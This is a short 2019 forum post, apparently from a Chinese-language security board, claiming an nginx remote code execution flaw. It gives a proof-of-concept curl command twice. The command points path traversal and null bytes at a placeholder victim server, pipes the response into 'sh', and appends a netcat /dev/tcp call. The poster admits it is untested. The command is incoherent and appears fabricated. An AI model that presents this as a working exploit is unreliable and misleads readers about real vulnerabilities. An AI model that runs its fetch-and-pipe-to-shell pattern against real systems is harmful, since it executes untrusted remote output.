NGINX RCE - 資安
By Lucy
at 2019-06-01T10:58
at 2019-06-01T10:58
Table of Contents
https://github.com/nginx/njs/issues/159
https://twitter.com/alisaesage/status/1134400951043874816
https://twitter.com/notdan/status/1134559331989434368
POC 的方式:
curl -gsS \
https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \
<'protocol:TCP' -O 0x0238f06a#PLToffset | \
sh; nc /dev/tcp/localhost
完全沒經過測試 不過先升級 nginx 就是對的
--
https://twitter.com/alisaesage/status/1134400951043874816
https://twitter.com/notdan/status/1134559331989434368
POC 的方式:
curl -gsS \
https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \
<'protocol:TCP' -O 0x0238f06a#PLToffset | \
sh; nc /dev/tcp/localhost
完全沒經過測試 不過先升級 nginx 就是對的
--
Tags:
資安
All Comments
By Mary
at 2019-06-02T13:18
at 2019-06-02T13:18
Related Posts
heap feng shui 的定義?
By Faithe
at 2019-05-30T12:46
at 2019-05-30T12:46
一句話木馬
By Damian
at 2019-05-26T04:20
at 2019-05-26T04:20
一句話木馬
By Edith
at 2019-05-25T11:22
at 2019-05-25T11:22
一句話木馬
By Necoo
at 2019-05-24T20:13
at 2019-05-24T20:13
CVE-2019-0708
By Hedy
at 2019-05-20T15:09
at 2019-05-20T15:09